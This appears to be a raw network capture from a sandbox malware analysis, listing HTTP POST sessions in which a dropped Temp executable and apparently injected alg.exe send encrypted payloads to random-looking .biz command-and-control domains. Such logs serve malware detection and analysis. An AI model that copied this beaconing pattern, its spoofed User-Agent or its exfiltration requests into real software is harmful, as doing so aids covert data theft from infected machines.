                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: npukfztj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 836
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:35.274460077 CET836OUTData Raw: 28 18 94 67 87 0e af 5c 38 03 00 00 50 68 5e 3e f3 54 b0 22 51 8d 42 a7 3d 82 9f 7b 98 4d c4 87 c3 91 ad c1 ea b5 4b 65 e7 e2 c5 82 e1 84 11 f3 b9 46 cc 26 d7 56 18 63 c0 d2 ae 6b c8 87 0b d9 f2 5f 6b eb 25 24 59 f3 ce 9c ad 3d bd 1f 33 3a 6a 95
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: (g\8Ph^>T"QB={MKeF&Vck_k%$Y=3:jMfDU[D%(#HbDn@*W@?_'MrGZ]3$w]} b+TfUa5Lh>(uh3qh2
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:35.943691969 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:57:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=89ee7776a689128dd7f50fb758f2aba3|155.94.241.187|1731920255|1731920255|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.10 | 49846 | 172.234.222.143 | 80 | 7256 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:36.938134909 CET | 357 | OUT | POST /rneunjrpeefdom HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 836
Nov 18, 2024 09:57:36.938134909 CET | 836 | OUT | Data Raw: 16 0f b6 01 90 02 fc 12 38 03 00 00 e1 76 10 0b 81 ef 60 b7 27 66 36 7f 48 31 3b 57 08 55 a5 d4 5a a6 4c a7 f1 fc 4c 03 07 c3 23 87 c7 69 95 29 1f 3f c1 2d 3c b1 98 77 2e f5 9e ea 22 5e 76 49 e2 db ec a6 84 5b 63 84 78 0e 01 5b be bc 81 63 ba b6
Data Ascii: 8v`'f6H1;WUZLL#i)?-<w."^vI[cx[cL9%\SQ3Q~Oya=QdK?Y|.Q)u5iq2y(KK@0rhRvhnf1IA,w$>KbL\B 3_(oBO#d=D<V>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.10 | 49851 | 44.221.84.105 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:37.347918987 CET | 348 | OUT | POST /jnek HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: npukfztj.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:57:37.347935915 CET | 778 | OUT | Data Raw: 73 9d e0 be 63 2c 56 36 fe 02 00 00 90 32 85 82 8a ca b7 cd 6a 4a 98 7a 68 d4 dc b3 59 a5 82 a0 b7 d0 fd 92 e5 b0 6c bb 96 7c d5 60 98 73 d1 92 cd 15 d4 f7 2c 70 68 18 24 06 aa 60 5d 96 2e 24 8e 80 5d 89 6c 65 be d6 b5 13 92 2f ae 72 fd 30 c0 62
Data Ascii: sc,V62jJzhYl|`s,ph$`].$]le/r0blqhV>3*G@3=Bz0+;{oX'F ?RcT]T ynO4Hm*t*w70Y}zoq/mClNt[m hXrbzeEW,853L0r.fo?"HW8
Nov 18, 2024 09:57:37.998219013 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:57:37 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=6ad5a03a4017e27709d6e77750250d4d|155.94.241.187|1731920257|1731920257|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.10 | 49852 | 172.234.222.143 | 80 | 7256 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:37.675784111 CET | 347 | OUT | POST /ogua HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 836
Nov 18, 2024 09:57:37.675828934 CET | 836 | OUT | Data Raw: 73 c1 a4 09 62 ae f7 06 38 03 00 00 5c 52 39 6b 01 81 74 ae d2 01 8a 86 c4 95 94 fc 3c b6 d5 ec 22 70 de 16 4e 7e 33 f7 88 0c 98 19 c9 4f cb 86 32 39 f5 eb a2 d3 68 48 cb da 10 7a 98 1a 69 a5 53 12 39 3b 75 e1 19 64 77 14 3a 51 49 fc 77 cf 94 50
Data Ascii: sb8\R9kt<"pN~3O29hHziS9;udw:QIwPFMN70k;Z g)> P$\{LY[Q"]<)$4gEN$!FYhUm%co5Q's?mZ>2B$w|@


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.10 | 49858 | 172.234.222.138 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:38.248008966 CET | 352 | OUT | POST /yypcywwrp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.10 | 49860 | 18.141.10.107 | 80 | 7256 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:38.391398907 CET | 349 | OUT | POST /mekek HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: knjghuig.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 836
Nov 18, 2024 09:57:39.849206924 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:57:39 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=78b232a6806e5ffff8e451075144dec0|155.94.241.187|1731920259|1731920259|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.10 | 49867 | 82.112.184.197 | 80 | 7256 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:39.998915911 CET | 350 | OUT | POST /qfuwtgjk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lpuegx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 836


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.10 | 49868 | 172.234.222.138 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:40.069932938 CET | 346 | OUT | POST /mdv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.10 | 49870 | 82.112.184.197 | 80 | 7256 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:40.701502085 CET | 356 | OUT | POST /tcewuceccwlpap HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lpuegx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 836
Nov 18, 2024 09:57:40.701529980 CET | 836 | OUT | Data Raw: dd 95 f2 be 63 49 4b 94 38 03 00 00 ec 42 ce ad 08 43 2c 8f 8e 5e 7e 6c b6 d1 17 25 54 32 0c 6d c4 cf 9b f6 ce ce 15 2d 4d d9 6c cc a8 e4 41 e1 fc 1a ea 3c 9b a3 a8 38 10 90 83 d4 f5 dd 4f af db bf 03 e3 67 b8 7c 9b 4c 6d aa 77 c6 5c 70 f9 b0 d4
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: cIK8BC,^~l%T2m-MlA<8Og|Lmw\p+OM1Jk%f$X+F^W}T ^?}V>wMbXjh hTse|"=94EMPSR*h;X5`QQWL&x


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.10 | 49876 | 18.141.10.107 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:41.888501883 CET | 355 | OUT | POST /kiuupxbhsmi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: knjghuig.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 18, 2024 09:57:41.888617992 CET | 778 | OUT | Data Raw: ee bf 96 e1 7d 60 03 e5 fe 02 00 00 34 cf d3 8a 61 53 de 6a 16 2f 86 2b 5c aa 56 8b 7a 8d 03 74 6d ac e5 e7 f0 33 e4 d8 cc 01 14 af b2 03 42 38 45 8a 4a da e9 94 cf b2 ad fb f0 d2 da 44 99 5a a3 6c 94 31 bd ab 95 7c 9f af 24 a4 99 d7 f7 26 a5 3e
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: }`4aSj/+\Vztm3B8EJDZl1|$&>Zr2,!uPc{=ZV2{zP|e:a1VQu*J-/=?OV)To!S^"M:/)u}dPpa..]SisK:)
Nov 18, 2024 09:57:43.124933004 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:57:42 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=656e984b91d5ebd58b0c177c7246b7e4|155.94.241.187|1731920262|1731920262|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.10 | 49890 | 82.112.184.197 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:44.111305952 CET | 356 | OUT | POST /llpilismcsqqsd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 18, 2024 09:57:44.111342907 CET | 778 | OUT | Data Raw: b6 65 80 ec e2 00 99 26 fe 02 00 00 fc 21 58 d6 c9 ba af c6 47 ae f6 2b 47 61 8e 4d 5f fb bb 83 58 62 29 1e 4b 2b b9 5a 5d 5d 87 39 93 91 d4 5f 91 51 a4 4a 06 bb e9 14 13 79 65 7f 33 94 ff 8f 0a 47 a5 73 eb c9 3e a2 0d 3c e2 fa 20 58 78 12 8b 72
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: e&!XG+GaM_Xb)K+Z]]9_QJye3Gs>< Xxr[ErI/a^PaniTk):-LAqUpA5@D]O_X,2iK /msr{c(y70%$Wqa?W-{o5Xkjlj%H+4


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.10 | 49897 | 82.112.184.197 | 80 | 7256 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:45.453375101 CET | 359 | OUT | POST /aldxsqumvddjjq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 836
Nov 18, 2024 09:57:45.453424931 CET | 836 | OUT | Data Raw: ab d1 1e 2a 9a 3b 77 97 38 03 00 00 13 bd 4d d2 b7 f8 57 5d 7e c9 dc 7b 90 51 18 40 a7 71 86 5b 4c bc 2c fb 43 e1 6c d6 d0 2d 27 a0 f4 fb 51 18 15 8e 5b 1a 12 8a 9f ed a9 70 fe db 01 5c 1e 48 2e 68 fb 01 f6 a4 02 ad 17 bd da 94 2b ca 61 88 a8 b9
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: *;w8MW]~{Q@q[L,Cl-'Q[p\H.h+a7C+rjGtM]gJt$~<d#-k56$L=8@-FEhbkY;K(_n^Xg_'_*Ni,jVp/0U


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.10 | 49929 | 82.112.184.197 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:57:52.941453934 CET | 354 | OUT | POST /qwmkydqbbfrm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 18, 2024 09:57:52.941487074 CET | 778 | OUT | Data Raw: bb 3a 8c 97 1f 7a c6 3c fe 02 00 00 55 9a 87 c0 23 12 c9 60 af f9 1d 87 30 3e 63 8a a0 e9 72 ef 06 fb bc 04 c0 86 a8 6c bd 0d 26 9c 2d fb 17 1a 1d 3a 77 0e 13 2f 53 52 82 2a 88 9b b7 62 97 65 25 f9 80 dc ba d7 e4 76 68 6f 3f b3 2b af 22 52 b4 db
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: :z<U#`0>crl&-:w/SR*be%vho?+"R^BOmL6#u<C.NBQuKQJQDCqVdkk3'HU:rd=ms4f\u;C\U7d(,SU9oz;c,+


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.10 | 49978 | 82.112.184.197 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:02.509984970 CET | 358 | OUT | POST /ebrtsarfcsylm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.10 | 49999 | 82.112.184.197 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:11.096322060 CET | 354 | OUT | POST /fymfqakvq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vjaxhpbji.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.10 | 50000 | 47.129.31.212 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:13.592339993 CET | 356 | OUT | POST /dauxqowjtksae HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xlfhhhm.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:58:15.069251060 CET | 415 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:58:14 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5542e77911e5d206d30eeff9fdbeab8c|155.94.241.187|1731920294|1731920294|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
22 | 192.168.2.10 | 50001 | 54.244.188.177 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:14.952994108 CET | 354 | OUT | POST /codtypdrb HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pywolwnvd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 18, 2024 09:58:15.787637949 CET | 417 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:58:15 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=3ed6212fcf6e4ffba04f7a8c6c6fa5e7|155.94.241.187|1731920295|1731920295|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.10 | 50002 | 13.251.16.150 | 80 | 7888 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:15.273842096 CET | 353 | OUT | POST /xurkvjsynkj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ifsaia.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:58:15.273859024 CET | 778 | OUT | Data Raw: 38 0a d0 f9 81 90 5e 2f fe 02 00 00 f2 dd 55 9a e1 9b 7f 44 f8 d5 e8 03 dd 47 18 c1 f1 b0 83 ff 87 8b 36 34 5c 61 5a b2 22 8a 6e 10 7e bc cd 53 b5 70 fd 7d 46 cd 9e 1f 58 1e a1 e2 68 b8 26 86 82 08 11 14 d8 d3 a7 15 58 7f 6f dd a2 48 b6 fa 4e 31
Data Ascii: 8^/UDG64\aZ"n~Sp}FXh&XoHN1pP!q[I`y/}}#3zS=g$CS8GA~x>@Y4H:8d8h{hn8w'Ii_F+Ueyn9.zdr#Aa|&


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.10 | 50003 | 13.251.16.150 | 80 | 7888 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:15.592030048 CET | 357 | OUT | POST /mjdirtnxyxmmbdd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ifsaia.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:58:15.592030048 CET | 778 | OUT | Data Raw: 7e 11 23 02 d4 ff cc ec fe 02 00 00 51 a8 9b 13 b6 ce 96 f8 6f f2 52 ba c2 ab 73 2a ff 75 bd 45 e2 9c 55 c9 00 05 3d c9 ce e6 3c 59 a5 35 fb d8 4a 75 0b ce 84 43 c3 05 2a 28 a9 b6 28 2b 5c 8e 0b c1 f2 68 07 0e f1 b7 8f 3e 7c 8e 9e db e0 1c 8d 08
Data Ascii: ~#QoRs*uEU=<Y5JuC*((+\h>|=t?%FU"Drm}1/;`v8 (T6IuM86J?-P@d{7Kh@5>OjccqGq69<dyG#mvBiN}>Tu/S3A[d
Nov 18, 2024 09:58:17.031522036 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:58:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=e2b78041bd9aaa8d555633efcb9ff28d|155.94.241.187|1731920296|1731920296|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
25 | 192.168.2.10 | 50004 | 18.141.10.107 | 80

Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:15.806526899 CET | 345 | OUT | POST /qd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ssbzmoy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 18, 2024 09:58:15.806541920 CET | 834 | OUT | Data Raw: b1 8b 7a a5 f1 95 3c 00 36 03 00 00 bd 4a d9 8e e4 24 03 c7 be 4f fc f3 9f a5 f2 0f 3d 71 01 3b cb c8 85 db 47 e5 b5 d3 80 bd ca 73 93 b3 08 91 da 5c 82 44 c7 1f 18 51 fd f9 b1 bb c3 33 09 b6 97 8d 03 3a b6 b6 59 2f 78 0f 6d 12 4d 00 7b 66 0a 17
Data Ascii: z<6J$O=q;Gs\DQ3:Y/xmM{f)JV2nrG5WWpqmrf(,6'4]+1QB|[Q1UD/='+/ra_I9""jg1dRiL]LTAE/Q6|
Nov 18, 2024 09:58:17.264738083 CET | 415 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:58:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ac81a3800b8747ac2a4eee83646c98cf|155.94.241.187|1731920296|1731920296|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
